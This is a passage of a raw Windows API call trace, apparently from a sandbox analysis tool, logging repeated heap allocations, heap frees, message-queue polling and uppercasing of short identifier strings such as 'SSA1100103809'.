RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0220.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0220.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0220.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0220.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0220.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0220.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0220.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0220.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0220.031] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0220.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0220.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0220.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0220.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0220.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0220.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0220.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0220.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0220.032] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0220.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0220.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0220.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0220.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0220.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0220.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0220.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0220.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0220.032] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0220.032] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0220.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0220.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0220.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0220.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0220.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0220.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0220.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0220.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0220.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0220.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0220.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0220.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0220.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0220.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0220.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0220.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0220.033] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0220.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0220.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0220.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0220.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0220.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0220.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0220.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0220.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0220.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0220.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0220.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0220.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0220.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0220.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0220.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0220.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0220.033] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0220.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0220.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0220.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0220.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0220.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0220.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71de8 [0220.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0220.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0220.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71db8 [0220.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0220.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0220.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab860 [0220.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0220.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0220.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0220.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0220.034] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0220.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0220.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0220.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0220.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0220.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0220.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e88 [0220.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0220.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0220.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ea8 [0220.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0220.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0220.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0220.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0220.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0220.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0220.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0220.035] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0220.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0220.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0220.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0220.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0220.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0220.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71eb8 [0220.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0220.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0220.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0220.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0220.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0220.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0220.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0220.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0220.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0220.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0220.035] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0220.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0220.035] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0220.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0220.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0220.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab710 [0220.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0220.036] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0220.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0220.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0220.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba28 [0220.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71fe8 [0220.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0220.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0220.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71fe8 [0220.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0220.036] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0220.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0220.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0220.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0220.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0220.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0220.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0220.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0220.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0220.036] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0220.036] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0220.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0220.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ec8 [0220.037] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0220.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0220.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0220.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab8d8 [0220.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73b78 [0220.037] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0220.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0220.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71fe8 [0220.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0220.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0220.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72028 [0220.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba28 [0220.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0220.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0220.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0220.037] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0220.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0220.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0220.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0220.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7b8 | out: hHeap=0x2af0000) returned 1 [0220.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0220.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0220.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0220.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0220.037] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0220.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0220.037] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0220.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0220.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71fe8 [0220.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0220.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0220.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0220.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0220.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0220.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0220.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0220.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0220.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0220.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0220.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73b78 | out: hHeap=0x2af0000) returned 1 [0220.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0220.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0220.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0220.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0220.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0220.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72028 [0220.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0220.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0220.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0220.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0220.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0220.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0220.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0220.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0220.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0220.039] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0220.039] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0220.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0220.039] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0220.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0220.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0220.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab9b0 [0220.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a746b8 [0220.039] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0220.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0220.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0220.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0220.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0220.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71fe8 [0220.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0220.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0220.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0220.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0220.039] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0220.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0220.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0220.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0220.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 